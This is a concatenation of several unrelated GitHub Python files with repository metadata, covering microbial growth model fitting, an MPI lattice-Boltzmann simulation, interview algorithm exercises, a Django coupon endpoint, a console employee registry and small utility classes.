dxdt = args[0]*( s / (args[1] + s) ) * x
# Substrate consumption rate
dsdt = - args[2] * dxdt # - args[3] * x
# Acid production rates
dpdt = [ - args[i] * dsdt for i in [3, 4, 5] ]
# Return ODE system
return [dxdt, dsdt, *dpdt]
# Set model params
umax = 0.18 #/h
Ks = 62.24 # #g/L
Yxs = 8.51
Yps_gluc_1 = 0.003
# Yps_gluc_2 = 0.4
Yps_oxal_1 = 0.4
# Yps_oxal_2 = 0.2
Yps_citr_1 = 0.06
# Yps_citr_2 = 0.02
params = Parameters()
params.add(name='umax', value= umax, min=0, vary=False)
params.add(name='Ks', value= Ks, min=0, vary=False)
params.add(name='Yxs', value= Yxs, min=0, vary=True)
params.add(name='Yps_gluc_1', value=Yps_gluc_1, vary=True)
# params.add(name='Yps_gluc_2', value=Yps_gluc_2, min=0, vary=True)
params.add(name='Yps_oxal_1', value=Yps_oxal_1, min=0, vary=True)
# params.add(name='Yps_oxal_2', value=Yps_oxal_2, min=0, vary=True)
params.add(name='Yps_citr_1', value=Yps_citr_1, min=0, vary=True)
# params.add(name='Yps_citr_2', value=Yps_citr_2, min=0, vary=True)
# Define regression
def regress( params ):
# Unpack params
umax = params['umax'].value
Ks = params['Ks'].value
Yxs = params['Yxs'].value
Yps_gluc_1 = params['Yps_gluc_1'].value
# Yps_gluc_2 = params['Yps_gluc_2'].value
Yps_oxal_1 = params['Yps_oxal_1'].value
# Yps_oxal_2 = params['Yps_oxal_2'].value
Yps_citr_1 = params['Yps_citr_1'].value
# Yps_citr_2 = params['Yps_citr_2'].value
args = ( umax, Ks, Yxs, Yps_gluc_1, Yps_oxal_1, Yps_citr_1 )
# Model prediction
c = odeint(monod, initial_states, times_m, args=args)
cX = c[:, 0]
# cS = c[:, 1]
cP0 = c[:, -3] # Gluconic
cP1 = c[:, -2] # Oxalic
cP2 = c[:, -1] # Citric
del c
weight = [1, 1, 10000, 10000, 10000]
# Compute error
I = ( states_m[:, 0] - cP0 )**2 + ( states_m[:, 1] - cP1 )**2 + (( states_m[:, 2] - cP2)*weight )**2
return I
# #######################################################################################
# Fit model parameters to measured data
# Minimise
method = 'Nelder'
result = minimize(regress, params, method=method)
result.params.pretty_print()
if fit_report_toggle:
print(fit_report(result))
# Redefine fitted model params
umax = result.params['umax'].value
Ks = result.params['Ks'].value
Yxs = result.params['Yxs'].value
Yps_gluc_1 = params['Yps_gluc_1'].value
# Yps_gluc_2 = params['Yps_gluc_2'].value
Yps_oxal_1 = params['Yps_oxal_1'].value
# Yps_oxal_2 = params['Yps_oxal_2'].value
Yps_citr_1 = params['Yps_citr_1'].value
# Yps_citr_2 = params['Yps_citr_2'].value
# args = (umax, Ks, Yxs, Yps_gluc_1, Yps_gluc_2, Yps_oxal_1, Yps_oxal_2, Yps_citr_1, Yps_citr_2)
args = (umax, Ks, Yxs, Yps_gluc_1, Yps_oxal_1, Yps_citr_1)
#######################################################################################
# Plot inhibition curves
xvline = 24
times_p = sorted( np.concatenate( ([xvline], np.linspace(1e-5, 300, 400)) ) )
Kis = np.array( [12.2] ) # [2, 3, 5, 10])
c_monod = odeint(monod, initial_states, times_p, args=args)
cX_no_inhib = c_monod[:,0] # Biomass concentration
cS_no_inhib = c_monod[:,1] # Substrate concentration
cP_no_inhib_1 = c_monod[:,2] # Product concentration
cP_no_inhib_2 = c_monod[:,3] # Product concentration
cP_no_inhib_3 = c_monod[:,4] # Product concentration
mic_name_1 = mic_name + ' (gluconic acid)'
mic_name_2 = mic_name + ' (oxalic acid)'
mic_name_3 = mic_name + ' (citric acid)'
# Plot biomass and sub. no inhibition curves
plot_inhibition_curves(
times_p,
initial_states,
[],
args,
haldane_3_products,
mic_name,
cX_no_inhib=cX_no_inhib,
cS_no_inhib=cS_no_inhib,
# cP_no_inhib=cP_no_inhib_1,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
# cP_measured=states_m[:,0],
# measurement_times=times_m
)
# Plot product no inhibition curve 1
plot_inhibition_curves(
times_p,
initial_states,
[],
args,
haldane_3_products,
mic_name_1,
# cX_no_inhib=cX_no_inhib,
# cS_no_inhib=cS_no_inhib,
cP_no_inhib=cP_no_inhib_1,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
cP_measured=states_m[:,0],
measurement_times=times_m,
cP_index=2
)
# Plot product no inhibition curve 2
plot_inhibition_curves(
times_p,
initial_states,
[],
args,
haldane_3_products,
mic_name_2,
# cX_no_inhib=cX_no_inhib,
# cS_no_inhib=cS_no_inhib,
cP_no_inhib=cP_no_inhib_2,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
cP_measured=states_m[:,1],
measurement_times=times_m,
cP_index=3
)
# Plot product no inhibition curve 3
plot_inhibition_curves(
times_p,
initial_states,
[],
args,
haldane_3_products,
mic_name_3,
# cX_no_inhib=cX_no_inhib,
# cS_no_inhib=cS_no_inhib,
cP_no_inhib=cP_no_inhib_3,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
cP_measured=states_m[:,2],
measurement_times=times_m,
cP_index=4
)
#################################################################################
# Plot biomass and sub. inhibition curves
plot_inhibition_curves(
times_p,
initial_states,
Kis,
args,
haldane_3_products,
mic_name,
cX_no_inhib=cX_no_inhib,
cS_no_inhib=cS_no_inhib,
# cP_no_inhib=cP_no_inhib_1,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
# cP_measured=states_m[:,0],
# measurement_times=times_m
)
# Plot product inhibition curve 1
plot_inhibition_curves(
times_p,
initial_states,
Kis,
args,
haldane_3_products,
mic_name_1,
# cX_no_inhib=cX_no_inhib,
# cS_no_inhib=cS_no_inhib,
cP_no_inhib=cP_no_inhib_1,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
cP_measured=states_m[:,0],
measurement_times=times_m,
cP_index=2
)
# Plot product inhibition curve 2
plot_inhibition_curves(
times_p,
initial_states,
Kis,
args,
haldane_3_products,
mic_name_2,
# cX_no_inhib=cX_no_inhib,
# cS_no_inhib=cS_no_inhib,
cP_no_inhib=cP_no_inhib_2,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
cP_measured=states_m[:,1],
measurement_times=times_m,
cP_index=3
)
# Plot product inhibition curve 3
plot_inhibition_curves(
times_p,
initial_states,
Kis,
args,
haldane_3_products,
mic_name_3,
# cX_no_inhib=cX_no_inhib,
# cS_no_inhib=cS_no_inhib,
cP_no_inhib=cP_no_inhib_3,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
cP_measured=states_m[:,2],
measurement_times=times_m,
cP_index=4
)
|
TheoBatik/microbial_models
|
5b_A_niger.py
|
5b_A_niger.py
|
py
| 9,887 |
python
|
en
|
code
| 0 |
github-code
|
6
|
14335019516
|
import numpy as np
import matplotlib.pyplot as plt
from mpi4py import MPI
from process_coordination import width_height, bool_boundaries, number_of_blocks
from streaming_functions import streaming, recalculate_functions
from plotting_functions import plot_velocity, plot_velocity_slice
# Initialize parallelization
comm = MPI.COMM_WORLD
size = comm.Get_size() # num of processes
rank = comm.Get_rank() # rank id of this process
n_timesteps = 20
n_plots = 3
# Initialize Grid:
nx_total = 20 # num of rows
ny_total = 16 # num of columns
# Arrange <size> blocks (num processes) as a optimized grid of
# <n_blocks[0]> rows times <n_blocks[1]> columns.
n_blocks = number_of_blocks((nx_total, ny_total), size)
# Initialize local grid parameters (local grid is the one of the block of this process):
# local size
nx, ny = width_height(rank, nx_total, ny_total, n_blocks)
nx_opt = nx_total//n_blocks[0]
ny_opt = ny_total//n_blocks[1]
# Initialize weights and discrete direction vectors
weights = np.array([4/9, 1/9, 1/9, 1/9, 1/9, 1/36, 1/36, 1/36, 1/36])
c = np.array([[0, 0], [0, 1], [-1, 0], [0, -1], [1, 0], [-1, 1], [-1, -1], [1, -1], [1, 1]])
# Initialize grid (add goast points or dry notes to each edge)
rho = np.ones((nx+2, ny+2)) # density values
v = np.zeros((2, nx+2, ny+2)) # average viscosity values
f = np.einsum("i,jk -> ijk", weights, np.ones((nx+2, ny+2))) # probability density function
# Check on which side this block borders another block or the boundary
borders = bool_boundaries(rank, n_blocks)
# Ranks of the processes of the neighboring blocks (only correct and used when theres no boundary on this side)
rank_right = rank + 1
rank_left = rank - 1
rank_up = rank - n_blocks[1]
rank_down = rank + n_blocks[1]
# Loop over timesteps
for idx_time in range(n_timesteps):
# Calculate the streaming step wrt (global) boundary conditions
f, rho, v = streaming(f, rho, v, c, weights, borders)
# Order of communcations is important in order that all the corner ghost points will get the diagonal adjacent values via two-step-communcation.
if not borders[0]:
comm.send(f[:, :, -2].copy(), rank_right)
data = comm.recv(source=rank_right)
f[:, :, -1] = data
if not borders[2]:
comm.send(f[:, :, 1].copy(), rank_left)
data = comm.recv(source=rank_left)
f[:, :, 0] = data
if not borders[1]:
comm.send(f[:, 1, :].copy(), rank_up)
data = comm.recv(source=rank_up)
f[:, 0, :] = data
if not borders[3]:
comm.send(f[:, -2, :].copy(), rank_down)
data = comm.recv(source=rank_down)
f[:, -1, :] = data
rho, v = recalculate_functions(f, rho, v, c) # Update values
# Plot average velocity vectors
if idx_time % (n_timesteps // n_plots) == 0:
# stack everything in rank 0
f_full = np.zeros((9, nx_total, ny_total))
rho_full = np.ones((nx_total, ny_total))
v_full = np.zeros((2, nx_total, ny_total))
f_list = comm.gather(f[:,1:-1,1:-1].copy(), root=0)
if rank == 0:
for rank_idx, f_block in enumerate(f_list):
block_pos = (rank_idx // n_blocks[1], rank_idx % n_blocks[1])
f_full[:, (nx_opt * block_pos[0]):(nx_opt * block_pos[0] + f_block.shape[1]), (ny_opt * block_pos[1]):(ny_opt * block_pos[1] + f_block.shape[2])] = f_block
rho_full, v_full = recalculate_functions(f_full, rho_full, v_full, c)
plot_velocity(f_full, v_full, return_plot=True)
plt.show()
|
Dunitrie/HPC
|
main.py
|
main.py
|
py
| 3,550 |
python
|
en
|
code
| 1 |
github-code
|
6
|
27554887332
|
# Given an array of integers nums and an integer target, return indices of the two numbers such
# that they add up to target. You may assume that each input would have exactly one solution, and you
# may not use the same element twice. You can return the answer in any order.
# Example1
# Input: nums = [2, 7, 11, 15], target = 9
# Output: [0, 1]
# Explanation: Because nums[0] + nums[1] == 9, we return [0, 1].
def target_sum(arr, t):
temp = tuple(arr)
if t in arr:
return arr.index(t)
res = []
while arr:
num = arr.pop()
diff = t - num
if diff in arr:
res.append((num, diff))
res_idx = [(temp.index(i[0]), temp.index(i[1])) for i in res]
return res_idx
ar = [1, 5, 6, 7, 9, 8, 2, 3]
tar = 12
# ar = [2, 7, 11, 15]
# tar = 9
print(f'Given list:{ar} and target:{tar}')
print(target_sum(ar, tar))
|
emurali08/Python_Revised_notes
|
Interview_tests/Interview_tests_2022/find_arr_items_to_target_sum.py
|
find_arr_items_to_target_sum.py
|
py
| 868 |
python
|
en
|
code
| null |
github-code
|
6
|
21998501456
|
class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
ans = 0
i = 0
n = len(s)
sub_str = dict()
for j in range(n):
if s[j] in sub_str:
i = max(i, sub_str[s[j]])
ans = max(ans, j - i + 1)
sub_str[s[j]] = j + 1
return ans
so = Solution()
print(so.lengthOfLongestSubstring("abcabcbb"))
|
hangwudy/leetcode
|
1-99/3_最长无重复字串.py
|
3_最长无重复字串.py
|
py
| 402 |
python
|
en
|
code
| 0 |
github-code
|
6
|
11301162272
|
from rest_framework.response import Response
from rest_framework.decorators import api_view
from datetime import datetime
from coupon.models import Coupon
from coupon.serializers import CouponSerializer
@api_view(['GET'])
def get_coupons(request):
user_id = request.GET.get('user_id')
expired = request.GET.get('expired')
page = request.GET.get('page')
limit = request.GET.get('limit')
if not user_id:
return Response({'success': False, 'message': '...'})
if not page:
page = 1
if not limit:
limit = 5
page = int(page)
limit = int(limit)
start = (page - 1) * limit
if not expired:
coupons = Coupon.objects.filter(user_id=user_id, expire__time__gte=datetime.now()).order_by('expire_time')[start: start + limit]
else:
coupons = Coupon.objects.filter(user_id=user_id).order_by('expire_time')[start: start + limit]
serializer = CouponSerializer(coupons, many=True)
return Response({'success': True, 'message': '成功', 'data': serializer.data})
|
jpswing/assmovie
|
coupon/views.py
|
views.py
|
py
| 1,042 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6600903749
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from datetime import date
import sys
if __name__ == '__main__':
# список работников
workers = []
# организация бесконечного цикла запроса команд
while True:
# запросить команду из терминала
command = input(">>>").lower()
# выполнить действие в соответствии с командой
if command == 'exit':
break
elif command == 'add':
# запрос данных пользователя
name = input("Имя: ")
fam = input("Фамилия: ")
year = input("Дата рождения (yyyy.mm.dd): ")
tel = input("Телефон: (x-xxx-xxx-xx-xx): ")
# создать словарь
worker = {
'name': name,
'fam': fam,
'year': year,
'tel': tel,
}
# добавление словаря в список
workers.append(worker)
# сортировка списка в случае необходимости
if len(workers) > 1:
workers.sort(key=lambda item: item.get('year', ''))
elif command.startswith('found '):
# разобрать команду на части для выделения номера
parts = command.split(' ', maxsplit=1)
# Получить требуемый номер
phone = (parts[1])
# Инициализировать счетчик
count = 0
# Проверить сведения работников из списка
for worker in workers:
if worker.get('tel', '') == phone:
count += 1
print(
'{:>4}: {:>15} | {:>15} | {:>15}'.format(count, worker.get('name', ''), worker.get('fam', ''), worker.get('tel', ''))
)
# Если счетчик равен 0, то работники не найдены
if count == 0:
print("Работники с заданным телефоном не найдены.")
elif command == 'all':
line = '+-{}-+-{}-+-{}-+-{}-+-{}-+'.format(
'-' * 4,
'-' * 20,
'-' * 20,
'-' * 12,
'-' * 20
)
print(line)
print(
'| {:^4} | {:^20} | {:^20} | {:^12} | {:^20} |'.format(
"№",
"Фамилия",
"Имя",
"Год",
"Телефон"
)
)
print(line)
for idx, worker in enumerate(workers, 1):
print(
'| {:^4} | {:^20} | {:^20} | {:^12} | {:^20} |'.format(
idx,
worker.get('name', ''),
worker.get('fam', ''),
worker.get('year', ''),
worker.get('tel', '')
)
)
print(line)
elif command == 'help':
# Вывести справку о работе с программой
print("Список команд:\n")
print("add - добавить работника;")
print("all - вывести список работников;")
print("found <x-xxx-xxx-xx-xx> - найти работника по номеру;")
print("help - отобразить справку;")
print("exit - завершить работу с программой.")
else:
print(f"Неизвестная команда {command}", file=sys.stderr)
|
Valentina1502/LABA_1
|
zd4.py
|
zd4.py
|
py
| 3,987 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
36148958510
|
class UTE:
"""
Modelo de uma usina termelétrica em um estudo de
planejamento energético.
"""
def __init__(self,
ute_id: int,
nome: str,
capacidade: float,
custo: float):
self.id = ute_id
self.nome = nome
self.capacidade = capacidade
self.custo = custo
@classmethod
def le_ute_da_linha(cls, linha: str):
"""
Processa uma linha do arquivo de entrada e constroi
o objeto UTE.
"""
ute_id = int(linha[1:7])
nome = linha[8:25].strip()
capacidade = float(linha[26:45])
custo = float(linha[46:65])
return cls(ute_id,
nome,
capacidade,
custo)
def __str__(self):
to_str = ""
for k, v in self.__dict__.items():
to_str += "{}: {} - ".format(k, v)
return to_str
|
rjmalves/lpoe
|
modelos/ute.py
|
ute.py
|
py
| 950 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
6032334630
|
from AutoTensor.q_learning.config_scheme import *
class ConfigBuilder:
def __build_item(self, node, name):
if isinstance(node, ValueNode):
return node.default
elif isinstance(node, OptionsNode):
return node.options[node.default]
elif isinstance(node, ClassNode):
return {"class_name": name, "args": self.build(node.args)}
elif isinstance(node, ListNode):
return [
self.__build_item(node.options[node.default], node.default)
]
def build(self, scheme):
"""
Takes a scheme and using its defaults builds a config that
can be edited by actions, used as states for the QLearner,
and passed to the model_builder to build a tensorflow model.
"""
config = {}
for name, node in scheme.items():
if isinstance(node, SubScheme):
config[name] = self.build(node.body)
else:
config[name] = self.__build_item(node, name)
return config
|
epeters3/AutoTensor
|
AutoTensor/q_learning/config_builder.py
|
config_builder.py
|
py
| 1,086 |
python
|
en
|
code
| 1 |
github-code
|
6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.